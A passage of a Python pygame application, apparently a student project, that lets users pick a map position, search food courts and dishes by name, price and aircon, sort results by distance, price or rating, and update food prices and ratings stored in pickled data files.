= self.time_in_range(start, end, datetime.time(current_hour, current_min, 0))\n if stall_opening == True:\n return (\"OPEN\")\n else:\n return (\"CLOSED\")\n\n # def between(self, a, b, c): #check if b is in between a and c\n # return ((a <= b) and (b < c)) or ((c < a) and (a <= b)) or ((b < c) and (c < a))\n\n def searchFoodByName(self, food_name):\n __resultList = []\n for food in self.food_list:\n if len(food_name) > 0:\n if food_name.lower() in food.name.lower(): # the keyword 'in' is to check whether a word contains in another word under food names\n __resultList.append(food)\n else: # if nth is inputted (eg. user inputs space bar), len of food_name is 0, so all the food belonging to this stall will be appended into the list\n __resultList.append(food)\n return __resultList\n\n def searchByPrice(self, min,\n max): # user enter min and max price and will return a list of food within the searched range\n __resultlist = []\n self.food_list = sorted(self.food_list, key=lambda x: x.price)\n for food in self.food_list:\n if food.price >= min and food.price <= max:\n __resultlist.append(food)\n return __resultlist\n\n def getFood(self, user_input):\n __searchResultList = []\n for food in self.food_list:\n if user_input.lower() in food.name.lower():\n __searchResultList.append(food)\n return __searchResultList\n\n\n# Food\nclass Food:\n # intialise\n def __init__(self, name, price, rating): # add the details of the foods into the Food object\n self.name = name\n self.price = price\n self.rating = rating\n\n\n# Vertex\nclass Vertex:\n def __init__(self, name, coordinates):\n self.name = name\n self.coordinates = coordinates\n self.distance = sys.maxsize\n self.predecessor = None\n self.visited = False\n self.adjacent = {}\n\n def __lt__(self, other):\n self_priority = self.distance\n other_priority = other.distance\n return self_priority < other_priority\n\n\n# Graph (contain Vertex)\nclass Graph:\n def __init__(self):\n self.vertex_set = []\n\n def add_vertex(self, name, coordinates):\n v = Vertex(name, coordinates)\n self.vertex_set.append(v)\n\n def add_adjacent(self, vertex1, vertex2):\n for node1 in self.vertex_set:\n if node1.name == vertex1:\n for node2 in self.vertex_set:\n if node2.name == vertex2:\n weight_x = node1.coordinates[0] - node2.coordinates[0]\n weight_y = node1.coordinates[1] - node2.coordinates[1]\n weight = math.sqrt(weight_x ** 2 + weight_y ** 2)\n node1.adjacent[node2.name] = weight\n node2.adjacent[node1.name] = weight\n\n def get_adjacent(self):\n list = []\n for vert in self.vertex_set:\n list.append(vert.adjacent)\n return list\n\n def set_start(self, posX, posY):\n nearest_distance = sys.maxsize\n for index, node in enumerate(self.vertex_set):\n if math.sqrt((node.coordinates[0] - posX) ** 2 + (node.coordinates[1] - posY) ** 2) < nearest_distance:\n nearest_distance = math.sqrt((node.coordinates[0] - posX) ** 2 + (node.coordinates[1] - posY) ** 2)\n nearest_index = index\n self.vertex_set[nearest_index].distance = nearest_distance # modify later\n return nearest_index\n\n def get_index(self, name):\n for index, node in enumerate(self.vertex_set):\n if node.name == name:\n return index\n\n\n# class for UI\nclass Textbox:\n def __init__(self, x, y, w, h, text, color, font_size=20):\n self.w = w\n self.h = h\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y, self.w, self.h)\n self.font = pygame.font.Font('freesansbold.ttf', font_size)\n self.text = text\n self.color = color\n text_srf = self.font.render(self.text, True, self.color)\n text_rect = 
text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n\n def draw_align(self, y_new, h_new, text_new):\n align_rect = pygame.Rect(self.x, y_new, self.w, h_new)\n text_align = self.font.render(text_new, True, self.color)\n text_align_rect = text_align.get_rect()\n text_align_rect.center = align_rect.center\n window_surface.blit(text_align, text_align_rect)\n\n\nclass Button:\n def __init__(self, x, y, w, h, text, color, font_size=20):\n self.w = w\n self.h = h\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y, self.w, self.h)\n self.font = pygame.font.Font('freesansbold.ttf', font_size)\n self.big_font = pygame.font.Font('freesansbold.ttf', font_size + 5)\n self.text = text\n pygame.draw.rect(window_surface, color, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n\n def move_and_click(self, mouseX, mouseY, color_click, counter, reverse):\n global screen_running\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n if self.rect.collidepoint(mouseX, mouseY):\n screen_running = False\n if reverse == False:\n counter += 1\n if reverse == True:\n counter -= 1\n time.sleep(0.2)\n return counter\n\n def move_and_take(self, mouseX, mouseY, color_click, counter, last):\n global screen_running\n map_index = None\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n if self.rect.collidepoint(mouseX, mouseY):\n screen_running = False\n counter += 1\n if last == False:\n map_index = -12 + self.y / 50\n else:\n map_index = -100 + self.y\n time.sleep(0.2)\n return counter, map_index\n\n def click_only(self, color_click, counter, reverse):\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n mouse_pressed = pygame.mouse.get_pressed()\n mouseX = mouseY = 0\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX, mouseY):\n if reverse == False:\n counter += 1\n if reverse == True:\n counter -= 1\n time.sleep(0.1)\n mouseX = mouseY = 0\n return counter\n\n def move_and_update(self, mouseX, mouseY, color_click):\n map_index = None\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, 
BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n if self.rect.collidepoint(mouseX, mouseY):\n map_index = -2 + self.y / 50\n return map_index\n\n\nclass Inputbox:\n def __init__(self, x, y, w, h, text, font_size=20):\n self.w = w\n self.h = h\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y, self.w, self.h)\n self.font = pygame.font.Font('freesansbold.ttf', font_size)\n self.text = text\n self.active = False # also use for Yes or No\n self.string = \"\"\n self.color = GREY\n\n def input_text(self, event):\n text_srf = self.font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.midright = self.rect.midleft\n window_surface.blit(text_srf, text_rect)\n unuse_key = [pygame.K_RETURN, pygame.K_LEFT, pygame.K_DOWN, pygame.K_UP, pygame.K_RIGHT, pygame.K_BACKSPACE]\n # for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if self.rect.collidepoint(event.pos):\n # Toggle the active variable.\n self.active = not self.active\n else:\n self.active = False\n # Change the current color of the input box.\n self.color = WHITE if self.active else GREY\n if event.type == pygame.KEYDOWN:\n if self.active:\n # if not event.key in unuse_key:\n if event.key == pygame.K_BACKSPACE and len(self.string) > 0:\n self.string = self.string[:-1]\n if not event.key in unuse_key:\n self.string += event.unicode\n pygame.draw.rect(window_surface, self.color, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_input_srf = self.font.render(self.string, True, BLACK)\n text_input_rect = text_input_srf.get_rect()\n text_input_rect.midleft = self.rect.midleft\n window_surface.blit(text_input_srf, text_input_rect)\n\n def tick_box(self, event):\n text_srf = self.font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.midright = self.rect.midleft\n window_surface.blit(text_srf, text_rect)\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if self.rect.collidepoint(event.pos):\n # Toggle the active variable.\n self.active = not self.active\n # Change the current color of the input box.\n if not self.active:\n pygame.draw.rect(window_surface, self.color, self.rect)\n if self.active:\n pygame.draw.rect(window_surface, self.color, self.rect)\n tick = pygame.transform.scale(tick_image, (self.w, self.h))\n window_surface.blit(tick, (self.x, self.y))\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n\n\n###function\ndef zoom_in():\n global WIDTH, HEIGHT, BLIT_X, BLIT_Y\n OLD_WIDTH, OLD_HEIGHT = WIDTH, HEIGHT\n WIDTH *= RATIO\n WIDTH = round(WIDTH)\n HEIGHT *= RATIO\n HEIGHT = round(HEIGHT)\n BLIT_X -= (WIDTH - OLD_WIDTH) / 2\n BLIT_Y -= (HEIGHT - OLD_HEIGHT) / 2\n\n\ndef zoom_out():\n global WIDTH, HEIGHT, BLIT_X, BLIT_Y\n OLD_WIDTH, OLD_HEIGHT = WIDTH, HEIGHT\n WIDTH /= RATIO\n WIDTH = round(WIDTH)\n HEIGHT /= RATIO\n HEIGHT = round(HEIGHT)\n BLIT_X -= (WIDTH - OLD_WIDTH) / 2\n BLIT_Y -= (HEIGHT - OLD_HEIGHT) / 2\n\n\ndef zoom_initial():\n global WIDTH, HEIGHT, BLIT_X, BLIT_Y\n if BLIT_X > 0:\n BLIT_X = 0\n elif BLIT_X < WIDTH_INIT - WIDTH:\n BLIT_X = WIDTH_INIT - WIDTH\n if BLIT_Y > 0:\n BLIT_Y = 0\n elif BLIT_Y < HEIGHT_INIT - HEIGHT:\n BLIT_Y = HEIGHT_INIT - HEIGHT\n\n\ndef mouse_to_pos(BLIT_X, BLIT_Y, WIDTH, HEIGHT, mouseX, mouseY):\n x = round((mouseX - BLIT_X) * WIDTH_INIT / 
WIDTH)\n y = round((mouseY - BLIT_Y) * HEIGHT_INIT / HEIGHT)\n return x, y\n\n\ndef main():\n global OLD_WIDTH, OLD_HEIGHT, WIDTH, HEIGHT, BLIT_X, BLIT_Y, FPS, screen_running, screen_counter\n screen_counter = 1\n subscreen1_counter = subscreen2_counter = subscreen3_counter = subscreen4_counter = 0\n mapscreen1_counter = mapscreen2_counter = 0\n map2_name = 0\n\n zoom_i = 0\n #######\n while True:\n file_data = open(\"main_data.txt\", \"rb\")\n foodcourt_list = pickle.load(file_data)\n node_data = open(\"node_data.txt\", \"rb\")\n g = pickle.load(node_data)\n if screen_counter == 1:\n mouseX = mouseY = posX = posY = 0\n screen_running = True\n while screen_running:\n pressed = pygame.key.get_pressed()\n mouse_pressed = pygame.mouse.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n ### using map\n if pressed[pygame.K_LEFTBRACKET] and 0 <= zoom_i < 5:\n zoom_in()\n zoom_i += 1\n elif pressed[pygame.K_RIGHTBRACKET] and 0 < zoom_i <= 5:\n zoom_out()\n zoom_i -= 1\n if pressed[pygame.K_RIGHT]:\n BLIT_X -= STEP\n elif pressed[pygame.K_DOWN]:\n BLIT_Y -= STEP\n elif pressed[pygame.K_LEFT]:\n BLIT_X += STEP\n elif pressed[pygame.K_UP]:\n BLIT_Y += STEP\n zoom_initial() # if the screen get out of the window\n #\n image = pygame.transform.scale(original_image, (WIDTH, HEIGHT))\n window_surface.fill(WHITE)\n window_surface.blit(image, (BLIT_X, BLIT_Y)) ####change this to blit it\n # draw on image\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n if not (mouseX > WIDTH_INIT - 230 and mouseY < 100):\n mouseX_check = mouseX\n mouseY_check = mouseY\n posX, posY = mouse_to_pos(BLIT_X, BLIT_Y, WIDTH, HEIGHT, mouseX_check, mouseY_check)\n if posX != 0 and posY != 0:\n position_box = Textbox(WIDTH_INIT - 210, 10, 170, 20, \"Position: \" + str(posX) + \", \" + str(posY),\n BLACK)\n submit_button = Button(WIDTH_INIT - 210, 40, 140, 35, \"SUBMIT?\", GREY, 30)\n screen_counter = submit_button.move_and_click(mouseX, mouseY, GREEN, screen_counter, False)\n # FPS\n clock.tick(FPS)\n pygame.display.flip()\n\n if screen_counter == 2 and subscreen1_counter == 0 and subscreen2_counter == 0 and subscreen3_counter == 0:\n mouseX = mouseY = 0\n screen_running = True\n food_inputbox = Inputbox(250, 250, 300, 50, \"Food name: \", 30)\n min_price = Inputbox(350, 350, 75, 50, \"Min price($): \", 30)\n max_price = Inputbox(350, 500, 75, 50, \"Max price($): \", 30)\n aircon_tick_box = Inputbox(950, 350, 75, 50, \"Aircon Availability \", 30)\n # min_price = Inputbox()\n while screen_running:\n # draw on surface\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n window_surface.fill(WHITE)\n pygame.draw.line(window_surface, BLACK, [0, 200], [WIDTH_INIT, 200], 5)\n pygame.draw.line(window_surface, BLACK, [0, 600], [WIDTH_INIT, 600], 5)\n food_court_button = Button(400, 75, 400, 75, \"Food court lists\", GREY, 30)\n subscreen1_counter = food_court_button.move_and_click(mouseX, mouseY, GREEN, subscreen1_counter, False)\n update_button = Button(200, 675, 400, 75, \"Update information\", GREY, 30)\n subscreen3_counter = update_button.move_and_click(mouseX, mouseY, GREEN, subscreen3_counter, False)\n add_button = Button(650, 675, 400, 75, \"Add new food\", GREY, 30)\n subscreen4_counter = add_button.move_and_click(mouseX, mouseY, GREEN, subscreen4_counter, False)\n search_button = Button(900, 480, 200, 75, \"Search\", GREY, 30)\n subscreen2_counter = search_button.move_and_click(mouseX, mouseY, YELLOW, 
subscreen2_counter, False)\n # back button\n back_button = Button(0, HEIGHT_INIT - 75, 100, 75, \"BACK\", RED, 30)\n screen_counter = back_button.move_and_click(mouseX, mouseY, RED, screen_counter, True)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n # draw input box\n food_inputbox.input_text(event)\n min_price.input_text(event)\n max_price.input_text(event)\n aircon_tick_box.tick_box(event)\n pygame.display.flip()\n\n clock.tick(FPS)\n\n if subscreen1_counter == 1:\n mouseX = mouseY = 0\n screen_running = True\n page_counter = 1\n aircon1_tick_box = Inputbox(300, 625, 75, 75, \"Aircon: \", 25)\n category_inputbox = Inputbox(300, 710, 290, 75, \"Category: \", 25)\n distance_tick_box = Inputbox(950, 700, 75, 75, \"Sort by distance: \", 25)\n while screen_running:\n # initialize new used class\n used_graph1 = Graph()\n used_graph1.vertex_set = [i for i in g.vertex_set]\n results1 = get_all_stalls(foodcourt_list)\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n if aircon1_tick_box.active:\n results1 = search_by_aircon_availability(results1)\n if len(category_inputbox.string) > 0:\n category_search_list = search_by_category(category_inputbox.string, foodcourt_list)\n results1 = intersection(results1, category_search_list)\n\n for i in results1:\n i[\"Distance\"] = round(shortest_path(used_graph1, posX, posY, i[\"Food Court Name\"], True))\n if distance_tick_box.active:\n results1 = mergesort(results1, \"Distance\", False)\n\n page_limit = int(len(results1) / 10)\n page_remain = len(results1) % 10\n window_surface.fill(WHITE)\n\n # back button\n back_button1 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen1_counter = back_button1.move_and_click(mouseX, mouseY, RED, subscreen1_counter, True)\n\n text1 = Textbox(0, 20, 200, 50, \"Food court\", BLACK, 14)\n text2 = Textbox(200, 20, 200, 50, \"Stall\", BLACK, 14)\n text3 = Textbox(400, 20, 200, 50, \"Category\", BLACK, 15)\n text4 = Textbox(600, 20, 350, 50, \"Address\", BLACK, 13)\n text5 = Textbox(950, 20, 75, 50, \"Aircon\", BLACK, 16)\n text6 = Textbox(1025, 20, 100, 50, \"Distance\", BLACK, 17)\n text7 = Textbox(1125, 20, 75, 50, \"Status\", BLACK, 17)\n pygame.draw.line(window_surface, BLACK, [0, 80], [WIDTH_INIT, 80], 5)\n\n if page_limit == 0:\n pass\n elif page_limit == 1 and page_remain == 0:\n pass\n elif page_counter == 1:\n scroll_right_button = Button(950, 625, 100, 50, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n elif (page_remain == 0 and page_counter == page_limit) or (page_counter == page_limit + 1):\n scroll_left_button = Button(800, 625, 100, 50, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n else:\n scroll_right_button = Button(950, 625, 100, 50, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n scroll_left_button = Button(800, 625, 100, 50, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n # draw table\n if page_limit != 0 and page_counter != page_limit + 1:\n for i in range((page_counter - 1) * 10, page_counter * 10):\n text1.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Food Court Name\"])\n text2.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Stall Name\"])\n text3.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Category\"])\n text4.draw_align(100 + (i - 
(page_counter - 1) * 10) * 50, 50, str(results1[i][\"Address\"]))\n text5.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50,\n str(results1[i][\"Aircon Availability\"]))\n text6.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results1[i][\"Distance\"]))\n text7.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results1[i][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 200 + (i - 1 - (page_counter - 1) * 10) * 50],\n [WIDTH_INIT, 200 + (i - 1 - (page_counter - 1) * 10) * 50], 1)\n if page_remain != 0:\n if page_counter == page_limit + 1:\n for i in range(page_remain):\n text1.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Food Court Name\"])\n text2.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Stall Name\"])\n text3.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Category\"])\n text4.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results1[i + page_limit * 10][\"Address\"]))\n text5.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results1[i + page_limit * 10][\"Aircon Availability\"]))\n text6.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results1[i + page_limit * 10][\"Distance\"]))\n text7.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results1[i + page_limit * 10][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 100 + (i + 1) * 500 / page_remain],\n [WIDTH_INIT, 100 + (i + 1) * 500 / page_remain], 1)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n aircon1_tick_box.tick_box(event)\n category_inputbox.input_text(event)\n distance_tick_box.tick_box(event)\n pygame.display.flip()\n clock.tick(FPS)\n\n if subscreen2_counter == 1:\n # variable or used object\n mouseX = mouseY = 0\n screen_running = True\n error = 0\n map_index = 0\n used_graph2 = Graph()\n used_graph2.vertex_set = [i for i in g.vertex_set]\n # get results list\n if len(max_price.string) == 0:\n max_price.string = str(sys.maxsize)\n if len(min_price.string) == 0:\n min_price.string = \"0\"\n results_list = []\n try:\n price_search_list = search_by_price(float(min_price.string), float(max_price.string), foodcourt_list)\n food_search_list = search_by_food(food_inputbox.string, foodcourt_list)\n results_list = intersection(food_search_list, price_search_list)\n for i in results_list:\n i[\"Distance\"] = round(shortest_path(used_graph2, posX, posY, i[\"Food Court Name\"], True))\n except ValueError:\n error = 1\n\n if aircon_tick_box.active:\n results_list = search_by_aircon_availability(results_list)\n page_counter = 1\n page_limit = int(len(results_list) / 10)\n page_remain = len(results_list) % 10\n # tick box\n price_tick_box = Inputbox(500, 625, 75, 75, \"Sort by price: \", 25)\n rating_tick_box = Inputbox(500, 710, 75, 75, \"Sort by rating: \", 25)\n distance_tick_box = Inputbox(900, 710, 75, 75, \"Sort by distance: \", 25)\n while screen_running:\n # get mouse pos\n mouseX = mouseY = 0\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n\n results = results_list\n if price_tick_box.active:\n results = mergesort(results, \"Price\", False)\n if rating_tick_box.active:\n results = mergesort(results, \"Rating\", True)\n if distance_tick_box.active:\n results = mergesort(results, \"Distance\", False)\n window_surface.fill(WHITE)\n # back_button\n back_button2 = Button(0, 
HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen2_counter = back_button2.move_and_click(mouseX, mouseY, RED, subscreen2_counter, True)\n # draw table\n text1 = Textbox(0, 20, 250, 50, \"Food court\", BLACK, 16)\n text2 = Textbox(250, 20, 250, 50, \"Stall\", BLACK, 16)\n text3 = Textbox(500, 20, 300, 50, \"Food name\", BLACK, 16)\n text4 = Textbox(800, 20, 100, 50, \"Distance\", BLACK)\n text5 = Textbox(900, 20, 100, 50, \"Price\", BLACK)\n text6 = Textbox(1000, 20, 100, 50, \"Rating\", BLACK)\n text7 = Textbox(1100, 20, 100, 50, \"Status\", BLACK)\n pygame.draw.line(window_surface, BLACK, [0, 80], [WIDTH_INIT, 80], 5)\n if error == 1:\n error_text = Textbox(0, -100, WIDTH_INIT, HEIGHT_INIT, \"Wrong input!\", RED, 40)\n if len(results) == 0:\n no_result_text = Textbox(0, 0, WIDTH_INIT, HEIGHT_INIT, \"No result was found!\", RED, 40)\n elif page_limit == 0:\n pass\n elif page_limit == 1 and page_remain == 0:\n pass\n elif page_counter == 1:\n scroll_right_button = Button(950, 625, 75, 75, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n elif (page_remain == 0 and page_counter == page_limit) or (page_counter == page_limit + 1):\n scroll_left_button = Button(800, 625, 75, 75, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n else:\n scroll_right_button = Button(950, 625, 75, 75, 'Next', GREY)\n page_counter = scroll_right_button.click_only(GREEN, page_counter, False)\n scroll_left_button = Button(800, 625, 75, 75, 'Previous', GREY)\n page_counter = scroll_left_button.click_only(RED, page_counter, True)\n # draw table\n if page_limit != 0 and page_counter != page_limit + 1:\n for i in range((page_counter - 1) * 10, page_counter * 10):\n # map_button\n vars()[\"map_button\" + str(i - (page_counter - 1) * 10)] = Button(800, 100 + (\n i - (page_counter - 1) * 10) * 50, 100, 50, \"\", GREY)\n mapscreen2_counter, map_index = vars()[\n \"map_button\" + str(i - (page_counter - 1) * 10)].move_and_take(mouseX, mouseY, WHITE,\n mapscreen2_counter, False)\n try:\n map2_name = results[int(map_index + page_counter * 10)][\"Food Court Name\"]\n except TypeError:\n pass\n # if map2_name != 0:\n # print(map2_name)\n text1.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Food Court Name\"])\n text2.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Stall Name\"])\n text3.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Food Name\"])\n text4.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results[i][\"Distance\"]))\n text5.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results[i][\"Price\"]))\n text6.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, str(results[i][\"Rating\"]))\n text7.draw_align(100 + (i - (page_counter - 1) * 10) * 50, 50, results[i][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 200 + (i - 1 - (page_counter - 1) * 10) * 50],\n [WIDTH_INIT, 200 + (i - 1 - (page_counter - 1) * 10) * 50], 1)\n\n if page_remain != 0:\n if page_counter == page_limit + 1:\n for i in range(page_remain):\n # map_button\n map_button = Button(800, 100 + i * 500 / page_remain, 100, 500 / page_remain, \"\", GREY)\n mapscreen2_counter, map_index = map_button.move_and_take(mouseX, mouseY, WHITE,\n mapscreen2_counter, True)\n try:\n map2_name = results[int(map_index * page_remain / 500 + page_limit * 10)][\n \"Food Court Name\"]\n except TypeError:\n pass\n text1.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n 
results[i + page_limit * 10][\"Food Court Name\"])\n text2.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Stall Name\"])\n text3.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Food Name\"])\n text4.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results[i + page_limit * 10][\"Distance\"]))\n text5.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results[i + page_limit * 10][\"Price\"]))\n text6.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n str(results[i + page_limit * 10][\"Rating\"]))\n text7.draw_align(100 + i * 500 / page_remain, 500 / page_remain,\n results[i + page_limit * 10][\"Open/Close\"])\n pygame.draw.line(window_surface, BLACK, [0, 100 + (i + 1) * 500 / page_remain],\n [WIDTH_INIT, 100 + (i + 1) * 500 / page_remain], 1)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n price_tick_box.tick_box(event)\n rating_tick_box.tick_box(event)\n distance_tick_box.tick_box(event)\n if price_tick_box.active:\n if rating_tick_box.active:\n price_tick_box.active = False\n if distance_tick_box.active:\n price_tick_box.active = False\n if rating_tick_box.active:\n if price_tick_box.active:\n rating_tick_box.active = False\n if distance_tick_box.active:\n rating_tick_box.active = False\n if distance_tick_box.active:\n if price_tick_box.active:\n distance_tick_box.active = False\n if rating_tick_box.active:\n distance_tick_box.active = False\n pygame.display.flip()\n clock.tick(FPS)\n\n if subscreen3_counter == 1:\n mouseX = mouseY = 0\n screen_running = True\n used_price = used_rating = 0\n # input box\n fc_update_box = Inputbox(200, 10, 250, 75, \"Food Court Name: \", 15)\n stall_update_box = Inputbox(600, 10, 200, 75, \"Stall name: \", 15)\n food_update_box = Inputbox(875, 10, 150, 75, \"Food: \", 15)\n price_update_box = Inputbox(400, HEIGHT_INIT / 2 + 50, 100, 50, \"Price: \")\n rating_update_box = Inputbox(800, HEIGHT_INIT / 2 + 50, 100, 50, \"Rating: \")\n fc_only = stall_only = food_only = -1\n\n while screen_running:\n window_surface.fill(WHITE)\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n # back_button\n back_button3 = Button(0, HEIGHT_INIT - 75, 150, 75, \"BACK\", RED, 30)\n subscreen3_counter = back_button3.move_and_click(mouseX, mouseY, RED, subscreen3_counter, True)\n\n pygame.draw.line(window_surface, BLACK, [0, 95], [WIDTH_INIT, 95], 5)\n fc_list = get_fc_name(fc_update_box.string, foodcourt_list)\n\n for i in range(len(fc_list)):\n button = Button(0, 100 + 50 * i, 400, 50, \"\", GREY)\n fc_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n fc_only = fc_list[int(fc_index)]\n fc_update_box.string = fc_only.name\n print(food_update_box.string)\n except:\n pass\n\n text = Textbox(0, 100 + 50 * i, 400, 50, fc_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [0, 150 + 50 * i], [400, 150 + 50 * i], 1)\n\n if fc_only != -1:\n stall_list = fc_only.getStallByName(stall_update_box.string)\n for i in range(len(stall_list)):\n button = Button(400, 100 + 50 * i, 400, 50, \"\", GREY)\n stall_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n stall_only = stall_list[int(stall_index)]\n stall_update_box.string = stall_only.name\n except:\n pass\n text = Textbox(400, 100 + 50 * i, 400, 50, stall_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [400, 150 + 50 * i], [800, 150 + 50 * i], 1)\n\n if 
stall_only != -1:\n food_list = stall_only.getFood(food_update_box.string)\n for i in range(len(food_list)):\n button = Button(875, 100 + 50 * i, 150, 50, \"\", GREY)\n food_index = button.move_and_update(mouseX, mouseY, WHITE)\n try:\n food_only = food_list[int(food_index)]\n food_update_box.string = food_only.name\n except:\n pass\n text = Textbox(875, 100 + 50 * i, 150, 50, food_list[i].name, BLACK, 14)\n pygame.draw.line(window_surface, BLACK, [875, 150 + 50 * i], [1025, 150 + 50 * i], 1)\n if food_only != -1:\n text_food = Textbox(1025, 10, 75, 75, \"Price\", BLACK, 15)\n text_rating = Textbox(1100, 10, 100, 75, \"Rating\", BLACK, 15)\n text1 = Textbox(1025, 100, 75, 50, str(food_only.price), BLACK)\n text2 = Textbox(1100, 100, 100, 50, str(food_only.rating), BLACK)\n text_update = Textbox(0, 0, WIDTH_INIT, HEIGHT_INIT, \"UPDATE!!!\", RED, 30)\n text_and = Textbox(550, HEIGHT_INIT / 2 + 50, 100, 50, \"AND\", RED, 30)\n\n try:\n used_price = float(price_update_box.string)\n used_rating = float(rating_update_box.string)\n if used_rating <=5:\n update_button = Button(WIDTH_INIT - 150, HEIGHT_INIT - 75, 150, 75, \"UPDATE\", YELLOW, 30)\n subscreen3_counter = update_button.move_and_click(mouseX, mouseY, GREEN, subscreen3_counter,\n True)\n except:\n pass\n if not screen_running and used_rating!=0 and used_price!=0:\n update(used_price, used_rating, fc_only.name, stall_only.name, food_only.name, foodcourt_list)\n file_update_data = open(\"main_data.txt\", \"wb\")\n pickle.dump(foodcourt_list, file_update_data)\n file_update_data.close()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n 